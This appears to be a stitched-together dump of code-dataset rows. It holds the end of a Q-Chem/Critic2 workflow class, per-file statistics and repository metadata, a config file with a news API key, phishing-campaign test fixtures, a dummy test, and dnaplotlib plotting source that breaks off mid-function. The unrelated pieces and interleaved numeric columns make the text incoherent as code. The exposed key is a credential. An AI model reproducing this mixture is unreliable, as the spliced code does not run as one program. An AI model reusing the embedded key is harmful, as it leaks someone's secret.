qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Perform a Q-Chem single point calculation in order to generate a cube file of the electron density
and then analyze the electron density critical points with the Critic2 package.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = copy.deepcopy(qchem_input_params) or {}
qchem_input_params["plot_cubes"] = True
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="SinglePointSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(RunCritic2(molecule=molecule, cube_file="dens.0.cube.gz"))
t.append(ProcessCritic2(molecule=molecule))
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
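A sketch of chaining these Fireworks into a workflow (hypothetical: "mol" is assumed to be a pymatgen Molecule, and passing molecule=None to the child is assumed to let it pick up the optimized structure from its parent):

from fireworks import Workflow

opt_fw = OptimizeFW(molecule=mol, name="opt")
freq_fw = FrequencyFW(molecule=None, name="freq", parents=opt_fw)
wf = Workflow([opt_fw, freq_fw], name="opt then freq")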
| 45.80518
| 106
| 0.593092
| 4,700
| 40,675
| 4.939574
| 0.082766
| 0.041351
| 0.05858
| 0.022484
| 0.877498
| 0.873406
| 0.86617
| 0.850362
| 0.846011
| 0.833262
| 0
| 0.005028
| 0.339939
| 40,675
| 887
| 107
| 45.856821
| 0.859692
| 0.529269
| 0
| 0.727447
| 0
| 0
| 0.085773
| 0.004679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019194
| false
| 0
| 0.017274
| 0
| 0.055662
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6514a00351bafe72d2ddee36994708bbb7f30ad
| 51
|
py
|
Python
|
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
NEWS_API_KEY = '<8d5f514bd83b414e9cc06c4df0ae8727>'
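Instance configs like this are normally loaded at startup; a hypothetical sketch (assumes a Flask app factory, which the project's layout suggests but the file itself does not show):

import os
from flask import Flask

app = Flask(__name__, instance_relative_config=True)
# Loads instance/config.py if present, overriding any packaged defaults.
app.config.from_pyfile('config.py', silent=True)
news_api_key = app.config.get('NEWS_API_KEY') or os.environ.get('NEWS_API_KEY')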
| 51
| 51
| 0.862745
| 4
| 51
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.387755
| 0.039216
| 51
| 1
| 51
| 51
| 0.469388
| 0
| 0
| 0
| 0
| 0
| 0.653846
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c8c791e6d197a6296f7914ad78462a1e5f0326b
| 10,145
|
py
|
Python
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
CAMPAIGN_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "5",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:01:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.99,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.85,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_2_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "4",
"name": "Verify your example account 798",
"occurred": "2021-11-21T16:00:00.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.97,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.86,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
OLD_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_EMPTY_CAMPAIGN = {}
INCIDENTS_BY_ID = {'0': CAMPAIGN_INCIDENT_CONTEXT, '1': NEW_EMPTY_CAMPAIGN, '3': OLD_INCIDENT_CONTEXT,
'4': NEW_INCIDENT_2_CONTEXT, '5': NEW_INCIDENT_CONTEXT}
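A hypothetical check built on this fixture data (the test name and assertions are illustrative, not part of the pack):

def test_new_incident_context_extends_campaign():
    context = INCIDENTS_BY_ID['5']  # NEW_INCIDENT_CONTEXT
    campaign = context['EmailCampaign']
    assert campaign['involvedIncidentsCount'] == len(campaign['incidents']) == 4
    assert context['ExistingCampaignID'] == ['809']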
| 33.592715
| 102
| 0.407097
| 666
| 10,145
| 6.165165
| 0.103604
| 0.09547
| 0.105699
| 0.115928
| 0.96152
| 0.96152
| 0.958841
| 0.958841
| 0.958841
| 0.947881
| 0
| 0.115886
| 0.463282
| 10,145
| 301
| 103
| 33.704319
| 0.6382
| 0
| 0
| 0.789298
| 0
| 0
| 0.402661
| 0.15377
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9cac519b9b19b3203af1c4ad2219f1501a79a95f
| 165
|
py
|
Python
|
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | 2
|
2021-05-24T23:19:21.000Z
|
2021-05-25T07:45:13.000Z
|
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | null | null | null |
# This is a dummy test file; delete it once the package actually has tests.
def test_import():
import qutip_tensorflow
assert qutip_tensorflow.__version__
| 23.571429
| 75
| 0.769697
| 24
| 165
| 5
| 0.833333
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 6
| 76
| 27.5
| 0.895522
| 0.442424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1ad2b91aa923995a47386d91a6b7325029404326
| 124,658
|
py
|
Python
|
dnaplotlib/dnaplotlib.py
|
scaralbi/dnaplotlib
|
a1fdd12ac3f3df1b16a0351402b8fe4f29b388d9
|
[
"MIT"
] | 1
|
2020-09-18T17:38:53.000Z
|
2020-09-18T17:38:53.000Z
|
dnaplotlib/dnaplotlib/dnaplotlib.py
|
CIDARLAB/pidgeon
|
875f3883aeac03b1c38bc592f262e18a390f482b
|
[
"BSD-3-Clause"
] | 2
|
2020-05-19T21:04:24.000Z
|
2020-05-20T23:56:07.000Z
|
dnaplotlib/dnaplotlib/dnaplotlib.py
|
CIDARLAB/pidgeon
|
875f3883aeac03b1c38bc592f262e18a390f482b
|
[
"BSD-3-Clause"
] | 3
|
2020-05-19T16:23:09.000Z
|
2020-08-04T22:28:21.000Z
|
#!/usr/bin/env python
"""
DNAplotlib
==========
This module is designed to allow for highly customisable visualisation of DNA
fragments. Diagrams can be in the form of conceptual SBOL compliant icons or
make use of icons whose width is scaled to allow for easier comparison of part
locations to trace information, such as for corresponding RNA-seq read depth
data. All plotting is performed using matplotlib and to an axis object. This
enables the export of publication quality, vector-based figures. Furthermore,
all standard renderers can be replaced with user defined versions to allow
for full customisation of the plot.
To make use of this module it is necessary to create the rendering object
after importing the module:
> import dnaplotlib as dpl
> dr = dpl.DNARenderer()
This object performs all rendering using the renderDNA() method. To describe
what should be plotted, dnaplotlib requires the DNA design in a specific
format. For standard SBOL diagrams a design is a list of dictionaries where
each dictionary relates to a specific part and as a minimum contains the
keys:
- name: A name that can be potentially used in regulation.
- type: The type of part (decides which renderer to use).
- fwd: Boolean defining if the part is in a forward orientation.
- start: Start position (optional)
- end: End position (optional)
Once this list is defined and an axis object is created, the design can be
drawn using the standard renderers to a user-created matplotlib axes by running:
> reg_renderers = dr.std_reg_renderers()
> part_renderers = dr.SBOL_part_renderers()
> regs = None
> design = ... Design is created here ...
> ax = ... matplotlib axes created here ...
> start, end = dr.renderDNA(ax, design, part_renderers, regs, reg_renderers)
The function returns the start and end point of the design which can then
be used for resizing the axes and figure. For more advanced use cases we
advise looking at the gallery distributed with this module.
"""
import math
import csv
from operator import itemgetter
# Set the backend to use (important for headless servers)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon, Ellipse, Wedge, Circle, PathPatch
from matplotlib.path import Path
from matplotlib.lines import Line2D
from matplotlib.patheffects import Stroke
import matplotlib.patches as patches
__author__ = 'Thomas E. Gorochowski <tom@chofski.co.uk>\n\
Bryan Der <bder@mit.edu>\n\
Emerson Glassey <eglassey@mit.edu>'
__license__ = 'MIT'
__version__ = '1.0'
###############################################################################
# SBOL Compliant Icon Renderers
###############################################################################
def write_label (ax, label_text, x_pos, opts=None):
""" Renders labels on parts.
"""
zorder_add = 0.0
y_offset = 0.0
label_style = 'normal'
label_size = 7
label_y_offset = 0
label_x_offset = 0
label_color = (0,0,0)
label_rotation = 0
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'label_style' in list(opts.keys()):
label_style = opts['label_style']
if 'label_size' in list(opts.keys()):
label_size = opts['label_size']
if 'label_y_offset' in list(opts.keys()):
label_y_offset = opts['label_y_offset']
if 'label_x_offset' in list(opts.keys()):
label_x_offset = opts['label_x_offset']
if 'label_color' in list(opts.keys()):
label_color = opts['label_color']
if 'label_rotation' in list(opts.keys()):
label_rotation = opts['label_rotation']
ax.text(x_pos+label_x_offset, label_y_offset+y_offset, label_text, horizontalalignment='center',
verticalalignment='center', fontsize=label_size, fontstyle=label_style,
color=label_color, rotation=label_rotation, zorder=30+zorder_add)
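# Sketch of a call with explicit options (hypothetical values; any subset of
# the keys handled above may be supplied):
#
#   write_label(ax, 'pTac', 50,
#               opts={'label_size': 9, 'label_rotation': 90,
#                     'label_y_offset': -12, 'label_color': (1, 0, 0)})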
def sbol_promoter (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL promoter renderer.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,0.0)
start_pad = 2.0
end_pad = 2.0
y_extent = 10
x_extent = 10
arrowhead_height = 2
arrowhead_length = 4
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction and add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the promoter symbol
l1 = Line2D([start,start],[0,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=9+zorder_add)
l2 = Line2D([start,start+dir_fac*x_extent-dir_fac*(arrowhead_length*0.5)],
[dir_fac*y_extent,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=10+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(start+dir_fac*x_extent-dir_fac*arrowhead_length,
dir_fac*y_extent+(arrowhead_height)),
(start+dir_fac*x_extent, dir_fac*y_extent),
(start+dir_fac*x_extent-dir_fac*arrowhead_length,
dir_fac*y_extent-(arrowhead_height))],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=1+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
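# Example design entry for this renderer (a sketch; the geometry keys shown
# are the renderer options handled above):
#
#   {'name': 'P1', 'type': 'Promoter', 'fwd': True,
#    'opts': {'x_extent': 8, 'y_extent': 8, 'arrowhead_length': 3,
#             'label': 'P1', 'label_y_offset': -12}}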
def sbol_cds (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL coding sequence renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
start_pad = 1.0
end_pad = 1.0
y_extent = 5
x_extent = 30
arrowhead_height = 4
arrowhead_length = 8
edgecolor = (0,0,0)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
if 'edge_color' in list(opts.keys()):
edgecolor = opts['edge_color']
# Check direction and add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the CDS symbol
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end-dir_fac*arrowhead_length, -y_extent),
(end-dir_fac*arrowhead_length, -y_extent-arrowhead_height),
(end, 0),
(end-dir_fac*arrowhead_length, y_extent+arrowhead_height),
(end-dir_fac*arrowhead_length, y_extent)],
edgecolor=edgecolor, facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
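# Example design entry for this renderer (a sketch showing the styling keys
# handled above, including 'hatch' and 'edge_color'):
#
#   {'name': 'gfp', 'type': 'CDS', 'fwd': True,
#    'opts': {'color': (0.3, 0.7, 0.3), 'edge_color': (0.0, 0.3, 0.0),
#             'hatch': '///', 'label': 'GFP', 'label_size': 8}}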
def sbol_terminator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL terminator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 10.0
x_extent = 8.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction and add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the terminator symbol
l1 = Line2D([start+dir_fac*(x_extent/2.0),start+dir_fac*(x_extent/2.0)],[0,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=8+zorder_add)
l2 = Line2D([start,start+(dir_fac*x_extent)],[dir_fac*y_extent,dir_fac*y_extent],
linewidth=linewidth, color=color, zorder=9+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_rbs (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL ribosome binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
start_pad = 2.0
end_pad = 2.0
x_extent = 10.0
edgecolor = (0,0,0)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
if 'edge_color' in list(opts.keys()):
edgecolor = opts['edge_color']
# Check direction and add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
rbs_center = (0,0)
if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
rbs_center = (end+((start-end)/2.0),0)
w1 = Wedge(rbs_center, x_extent/2.0, 180, 360, linewidth=linewidth,
facecolor=color, edgecolor=edgecolor, zorder=8+zorder_add)
ax.add_patch(w1)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),0)
w1 = Wedge(rbs_center, x_extent/2.0, 0, 180, linewidth=linewidth,
facecolor=color, edgecolor=edgecolor, zorder=8+zorder_add)
ax.add_patch(w1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_ribozyme (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL ribozyme renderer.
"""
return stick_figure(ax,type,num,start,end,prev_end,scale,linewidth,opts)
def stick_figure (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" General function for drawing stick based parts (e.g., ribozyme and protease sites).
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 5.0
y_extent = 10.0
linestyle = '-'
linetype = "";
shapetype = "";
if(type == "Ribozyme"):
linetype = 'dash'
headgroup = 'O'
elif(type == "Protease"):
linetype = 'dash'
headgroup = 'X'
elif(type == "ProteinStability"):
linetype = 'solid'
headgroup = 'O'
elif(type == "Ribonuclease"):
linetype = 'solid'
headgroup = 'X'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction and add start padding
final_end = end
final_start = prev_end
if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
rbs_center = (end+((start-end)/2.0),-y_extent)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=8+zorder_add)
x1 = Line2D([start,end],[-y_extent*1.25,-y_extent/1.5],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[-y_extent/1.5,-y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
dash1 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent/4],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
